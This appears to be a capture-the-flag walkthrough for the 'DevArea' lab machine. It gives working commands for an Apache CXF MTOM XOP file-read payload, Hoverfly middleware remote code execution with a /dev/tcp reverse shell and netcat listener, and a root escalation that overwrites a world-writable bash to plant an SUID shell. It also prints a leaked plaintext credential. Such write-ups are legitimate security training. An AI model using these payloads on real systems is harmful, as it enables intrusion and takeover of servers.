DevArea - Full

Technical Walkthrough

DevArea - Full Walkthrough

Overview

DevArea is a Medium Linux HTB machine featuring a 4-phase attack chain: FTP reconnaissance, Apache CXF SSRF via MTOM (<secret redacted>), Hoverfly middleware RCE, and privilege escalation through a world-writable bash binary.

Phase A: FTP Reconnaissance

Anonymous FTP login reveals a JAR file in the pub directory:

ftp -n <TARGET> <<EOF
user anonymous anonymous
binary
cd pub
mget *
bye
EOF

Downloaded: employee-service.jar — decompiling reveals a SOAP endpoint at http://devarea.htb:8080/employeeservice with a submitReport operation.

The WSDL confirms the namespace and operations:

curl -s 'http://devarea.htb:8080/employeeservice?wsdl'

Phase B: <secret redacted> - Apache CXF SSRF via MTOM XOP Include

The SOAP service uses Apache CXF with MTOM support. The xop:Include element accepts arbitrary href URIs including file://, allowing server-side file read.

Critical: The request MUST be multipart/related with MIME boundaries. A plain SOAP POST won't trigger the vulnerability.

curl -s "http://devarea.htb:8080/employeeservice" \
-H 'Content-Type: multipart/related; type="application/xop+xml"; boundary="MIMEBoundary"; start="<<email redacted>>"; start-info="text/xml"' \
--data-binary '--MIMEBoundary
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: 8bit
Content-ID: <<email redacted>>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ns2:submitReport xmlns:ns2="http://devarea.htb/">
      <arg0>
        <content><xop:Include href="file:///etc/systemd/system/hoverfly.service" xmlns:xop="http://www.w3.org/2004/08/xop/include"/></content>
        <employeeName>test</employeeName>
        <department>test</department>
        <confidential>false</confidential>
      </arg0>
    </ns2:submitReport>
  </soap:Body>
</soap:Envelope>

--MIMEBoundary--'

The response contains base64-encoded file content. Decoding reveals:

• Hoverfly credentials: admin:O7IJ27MyyXiU
• Service runs as user dev_ryan
• Binary at /opt/HoverFly/hoverfly

Phase C: Hoverfly Middleware RCE

Step 1: Get JWT Token

curl -s -X POST http://devarea.htb:8888/api/token-auth \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"<redacted>"}'

Step 2: Set Middleware (reverse shell)

The script must pass through stdin to stdout AND spawn the shell in background:

curl -s -X PUT "http://devarea.htb:8888/api/v2/hoverfly/middleware" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <JWT>" \
  -d '{"binary":"bash","script":"#!/bin/bash\ncat <(cat)\nbash -i >& /dev/tcp/<TARGET>/4444 0>&1 &"}'

Step 3: Switch Hoverfly to "modify" mode

In simulate mode, middleware only fires on matched simulations. Modify mode processes all requests:

curl -s -X PUT http://devarea.htb:8888/api/v2/hoverfly/mode \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <JWT>" \
  -d '{"mode":"modify"}'

Step 4: Start listener and trigger

nc -lvnp 4444  # on attacker

# Trigger via authenticated proxy request:
curl -x http://admin:<email redacted>:8500 http://www.test.com/

Result: Shell as dev_ryan. User flag at /home/dev_ryan/user.txt.

Phase D: Privilege Escalation - World-Writable Bash

Discovery

sudo -l
# (root) NOPASSWD: /opt/syswatch/syswatch.sh

ls -la /usr/bin/bash
# -rwxrwxrwx 1 root root 1446024 ... /usr/bin/bash

/usr/bin/bash is world-writable. The sudo script (syswatch.sh) uses bash as its interpreter. Overwriting bash with a malicious script and triggering it via sudo gives root code execution.

Exploitation

1. Back up bash and switch to dash:

cp /usr/bin/bash /tmp/bash.bak
exec /bin/dash

1. Kill all bash processes (to release "Text file busy" lock):

/bin/dash -c "killall -9 bash"

1. Overwrite /usr/bin/bash with exploit:

printf "#!/tmp/bash.bak\ncp /tmp/bash.bak /tmp/rootbash\nchmod 4755 /tmp/rootbash\n" > /usr/bin/bash

1. Trigger via sudo (runs as root, calls /usr/bin/bash which is now our script):

sudo /opt/syswatch/syswatch.sh --version

1. Get root:

/tmp/rootbash -p
# euid=0(root)
cat /root/root.txt

Lessons Learned

1. Hoverfly mode matters: Middleware only fires in modify or synthesize mode, NOT simulate without matches.
2. Middleware validation: Hoverfly tests the middleware script immediately on PUT. The listener must be ready AND the script must handle stdin/stdout properly.
3. Text file busy: Cannot overwrite a running binary. Must kill all processes using it first, and be in a different shell (dash) to survive.
4. Proxy auth: Port 8500 requires proxy authentication with the admin creds.

Attack Chain Summary

FTP anon -> JAR -> WSDL -> <secret redacted> SSRF -> hoverfly.service -> creds
-> Hoverfly JWT -> middleware RCE -> shell as dev_ryan -> user.txt
-> sudo syswatch.sh -> world-writable /usr/bin/bash -> SUID rootbash -> root.txt

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Target Details

• IP: <TARGET>
• Hostname: devarea.htb
• OS: Linux (Ubuntu)
• Difficulty: Medium
• Date: 2026-05-05
• Attacker IP: <TARGET>

Services Discovered (nmap)

Evidence Ledger

Credentials

Key Findings

1. FTP anonymous access reveals employee-service.jar
2. Apache CXF SOAP service vulnerable to <secret redacted> (MTOM XOP SSRF/file read)
3. Hoverfly systemd service leaks admin credentials
4. Hoverfly middleware RCE gives shell as dev_ryan
5. /usr/bin/bash is world-writable, exploitable via sudo syswatch.sh

Flags

• User: <hash redacted>
• Root: <hash redacted>